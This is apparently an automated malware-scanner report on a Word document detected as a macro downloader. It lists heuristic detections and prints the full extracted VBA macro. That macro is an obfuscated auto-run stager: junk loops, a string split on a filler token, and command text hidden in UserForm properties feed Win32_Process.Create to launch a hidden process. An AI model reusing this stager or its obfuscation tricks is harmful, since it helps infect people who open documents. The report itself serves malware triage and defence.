MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Sagent-7459479-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-7459479-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Zikxvsbrurea = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", XXXXX), "") + Wlohmbxf.Nsboizdpzuiyq + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Llyitqjc = CreateObject(Nzxreyuirwltz) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Yzyzsyikgcvl = GetObject(INSN & Zikxvsbrurea) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7873 bytes |
SHA-256: 58085ffc8dda8658cf2976dae71911dfbac4ca186479b529254b09e24e03575f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
265 of 392 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Wlohmbxf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nsboizdpzuiyq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Errfilzinaklg, Lwhnnpkev
For Lnikmigtx = Pwgpawccpm To Zlwcfitnw
Zlacncem = Agkgxonbtvuu
Zqfbldaput = Hex(Atpzkzyp)
Lwhtglczi = Chr(Qdxxdaprl)
Ytntmuluwqk = Jurwomvlc - Qsbhyixntu
Gnzionjpfjs = Jscyqfwvdc
Ewnsxblmgljp = Hex(Xtiehanxp)
Ocoarckfqkrv = Int(Hhbcxjnuj)
Next
Dim Vgcvdnhgr, Skttvegl
For Bekzffuefogg = Emwoaxjxhesoh To Wgkkmtcs
Inbmotlrwpjis = Mexghqxve
Wwfdctaqs = Hex(Lskgwlkrn)
Capelohkrxdgx = Chr(Tmpicsxete)
Tmlmvtwu = Xhljhskimmr - Xbfmgevvapnn
Kinavgeph = Lfuksjjiunkp
Pjsxsywjlza = Hex(Wenhujtvzb)
Gdedszsgk = Int(Mrpywbtuktxnd)
Next
Dim Chrzelxnnse, Xrbpfoyczynlv
For Aivdkcjnz = Pimplmuit To Xveylcjdoiiqn
Bfuodbnyyppkm = Nkdblzzmrge
Xhszkplonf = Hex(Jwfjwswcxvxml)
Btdhzfabrwpzx = Chr(Zfddbctc)
Itpcjgnrsju = Brivnmgsymuvs - Rtiqhsrml
Qchfghohb = Hgqpvjgugrwf
Becfkexwfwelt = Hex(Gkhvymcaswi)
Srtwhhfdmcr = Int(Katkkpahzgpk)
Next
Llyitqjc
End Sub
Attribute VB_Name = "Easpwgcbwkfj"
Attribute VB_Base = "0{44E853AD-C495-4EDA-A1F7-CAABD72FB8C8}{E0F90029-5277-45CC-9E55-529C6D30D26B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Xzzkpmgfgfh"
Function Qxqzlskyh()
Dim Flnmephmida, Rpvipiing
For Kzsipifxru = Yrvfqelhrr To Zzgbvwbzya
Wzwaxdfle = Rudsjufvtegip
Bvsnnxpq = Hex(Hkjoljhwcog)
Setfiaqq = Chr(Tbksqpzcdubbk)
Hvymnnxir = Usgqrazmqn - Rhcmdybquxy
Setlwstsh = Vncbcxftg
Elaukpjpx = Hex(Kzwgatuhy)
Uqpvaowreta = Int(Ikcidjrwnqccf)
Next
Jxcafeormlc = Wlohmbxf.Nsboizdpzuiyq
Dim Tbiwtelusjrac, Hqewtoenpn
For Vrqbvdslyb = Sigbsspnseyyo To Lpntirrqdbhvx
Lfdfekidvwxou = Smaghvkiehas
Kwsduttujqncm = Hex(Kcxakjvvrccax)
Esfdkafkzxzxd = Chr(Ejrltfcssqpa)
Ssvvlmux = Weryckmrm - Sjlfsbamnuzej
Ebrwygajp = Ephdxoddzjj
Kukvnwahrygk = Hex(Arszvqexkfj)
Bggvukxmdv = Int(Sogmrasxzclhj)
Next
Tmiypvnrxz = Jxcafeormlc + Easpwgcbwkfj.Ypjhiucujt + Easpwgcbwkfj.Jrbmjczvhlzqa + Easpwgcbwkfj.Rvbofqebud
Dim Mskfqyfosfgfv, Ycpxqfpzqyi
For Tckykolzqlkwk = Aekkcgebp To Qwtugiuhv
Hugbqirfbguh = Nxbspbubfy
Webcdqrfw = Hex(Apvjjvzw)
Itksogoagpim = Chr(Ndydeqtpxt)
Tskffbak = Rjojceqzvo - Vfxvsybtvq
Nwqakgmayc = Punoyxymyjw
Jjbjuoarbw = Hex(Ppoceltthgx)
Uysfodalra = Int(Qdnmxnxhai)
Next
Nfpcgefp = Tmiypvnrxz + Easpwgcbwkfj.Shbuwtgaarlzq + Easpwgcbwkfj.Qxvpaqknzamz
Dim Hchtgvtdha, Vcobypcoqzuz
For Jiqyfvgsuudym = Lqetqqjwma To Evhihghmknj
Nchtxacf = Jpgwizmdx
Cwmmvsekb = Hex(Iqdocdoai)
Qysbkzmy = Chr(Bukfvhbhyu)
Cgpsuxiox = Agouuifycpuhw - Gwnsjnzkv
Reopupovjz = Hzswyqizsz
Mbeclavsiir = Hex(Mvftbiizjf)
Raunmtrsxds = Int(Jieoezismm)
Next
Qxqzlskyh = Ynmrjwhfd + Nfpcgefp + Ynmrjwhfd
Dim Mfcgcjrab, Ocyborwj
For Smntxaxcbuwy = Wrjkqafjatrzs To Fytvnutpnei
Zleqvzewhmsrn = Tbyhxovvcc
Dcwghhhj = Hex(Besusxmbezl)
Mfbvjdqcnbwbt = Chr(Ljgzyezup)
Yibxurwgjagmy = Modwtylhputmi - Lmsnfibqgef
Efxiuasl = Kymaldbfnpwp
Kzplywrnkjdk = Hex(Rizcttipth)
Fysyfokdxu = Int(Muawncxbg)
Next
End Function
Function Llyitqjc()
Dim Inwlkbrbmtnu, Gwbshyhbxa
For Whnllphoprax = Yvvkpndulzoi To Mgqvlrekob
Nqvowecozlgmk = Cvnwcjwcibe
Oogucrznyxdkg = Hex(Aadlzdcoae)
Rommrsfalel = Chr(Mbdykmwslbiy)
Ulzgqxcizl = Rarzvptrnb - Psjwfmeoyhl
Yvmqdcrnyu = Mgsebxtn
Yogcmhvnkpc = Hex(Ugbkygdqxnutg)
Wjradhwyja = Int(Rlkfyzjyxz)
Next
XXXXX = "qwh_h2bd"
Zikxvsbrurea = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", XXXXX), "") + Wlohmbxf.Nsboizdpzuiyq + "rocess"
Dim Zhfkczzcdlwp, Kfnifhazhh
For Hpgmagnmm = Kltqngwceno To Ttenrzzyi
Kvqlpcezhqdw = Mtlexstsbth
Undqbpbfspkmc = Hex(Popwswefotk)
Suxenckmeacgj = Chr(Earvjecndkjd)
Owqldnysg = Ycknnqjlkbnbp - Pgttezuepelv
Wmusvlbsaquar = Avaqixrym
Dxvjbucn = Hex(Tiuitxgczdh)
Oikexafnhxuhd = Int(Paxdrqhmghp)
Next
Set Yzyzsyikgcvl = GetObject(INSN & Zikxvsbrurea)
Dim Smvwqhazkfu, Osmlsuct
For Ukyopvsz = Axmhpbpm To Mljfwrmdvukwm
Mstkesfz = Qfewreqf
Jbsryjoebqd = Hex(Gdiwckgg)
Dglhhequqersk = Chr(Mudbyxye)
Siinvckwfplmc = Lvnhlnsivqpce - Ebjiovhgvchvf
Zrvbnblxqka = Xfzfigkjdtt
Orfesnwf = Hex(Hdbxtesxouuiq)
Mybgvxbx = Int(Tsmsmehghs)
Next
Gysxeoifvby = Zikxvsbrurea + Easpwgcbwkfj.Ysvawgsy.ControlTipText + Easpwgcbwkfj.Rbizqemqs.ControlTipText
Dim Xvtdherax, Rrjflstfczx
For Ywlzjdcztl = Xalrmsuzli To Fmqzlchzohf
Rruapxgnworh = Hdhaqcxtxmd
Dvupvayvazy = Hex(Najxyrxmaw)
Oivxuhxag = Chr(Bywgougdjdgp)
Zomqedznjg = Xgsbvdki - Ckjstsxdisynu
Kczsoppolx = Iiceocalbh
Hqfxzejlzq = Hex(Kptimwxv)
Pugojlthi = Int(Qkyjrognolr)
Next
Nzxreyuirwltz = Gysxeoifvby + Wlohmbxf.Nsboizdpzuiyq
Dim Cnhovqnice, Rgslmmaufif
For Fzqsktnra = Fyvuhiizluc To Ohsexeuhf
Qxqrlozrfcg = Gmxafqkdmle
Itvgjzog = Hex(Sqoxulhcis)
Lhubpzldmmnkf = Chr(Ysgzkdcfjrsq)
Ivkzkiomh = Uayfcernpik - Quickkwitydq
Vyhmlvkqde = Mbccwytri
Lcwogabupzuwp = Hex(Ygiareddyugqb)
Lbfzvjogdpbjj = Int(Emuazmjiyuiy)
Next
Set Llyitqjc = CreateObject(Nzxreyuirwltz)
Dim Yfxjyixqdjif, Kimwzdtt
For Wmbibkukpf = Brvedplru To Aneatxubf
Nlhposoxpu = Hvauadig
Gbuxkbmvehaqe = Hex(Nbsdwkljkxesd)
Wasqffvqhmkuq = Chr(Qrrxmcpc)
Vrjafjjbgk = Oersklqlqvaig - Fhuhxwdk
Pbdasjzctd = Tremkwarb
Hetlccakudgu = Hex(Lxlbfnjozn)
Kmhkwkvj = Int(Zxwastscmxuzz)
Next
Llyitqjc.XSize = False
Dim Lhnbdiuu, Idlomecd
For Thouuovcdvur = Tueexmth To Rlkqldtne
Dssgomsqbk = Hvraxgjbmvj
Efqzbgnvup = Hex(Xizbqkubuc)
Cwguqwiipxkh = Chr(Adcvmfpozxj)
Kpcobkvweasey = Wayszykryzpp - Xikqaxtmjiw
Vdjqoyvrzzra = Xdplvqih
Oxjzjrpwt = Hex(Ooibrjwyjtp)
Vjtxbplolbcqo = Int(Hjuhsljoh)
Next
Llyitqjc.YSize = False
Dim Eskmwmbm, Plcabymcgfpic
For Aarlbqjzzn = Saktifcl To Ufivwzflwqjaw
Arhfmcmoxt = Mgczpjbfmdgtk
Rwrsdxjinvg = Hex(Hqkbvdtetruqu)
Xlnvrnvsgbyyd = Chr(Eitfxvseygb)
Fwbiqlkchlyim = Awfqfemlx - Begpoqdxmj
Hrnmwxvxkxo = Aletskdt
Gvrwhepmua = Hex(Yrrpobryeqcoo)
Dtywvahhrfbns = Int(Tdtcmncdwb)
Next
Do While Yzyzsyikgcvl.Create(Null & Qxqzlskyh, Iqgoixrvf, Llyitqjc, Uauxwnivonyv)
Loop
Dim Luayzniy, Xthqlpxfrybtx
For Qoxekajpk = Lvtwnlllez To Uauvsvbr
Uiyltxyodx = Dcmvlqhl
Plcdqfrui = Hex(Bbkxbsonqwe)
Xsjwklklyptn = Chr(Htxjoyncbbx)
Tyvikhigyvujw = Clrkschu - Pffuqizbnq
Hifaiixc = Ilzpjnqvmdbv
Clhnuijz = Hex(Eiestyxqnxwuv)
Mksejblnexwbk = Int(Ijwalbiybngl)
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.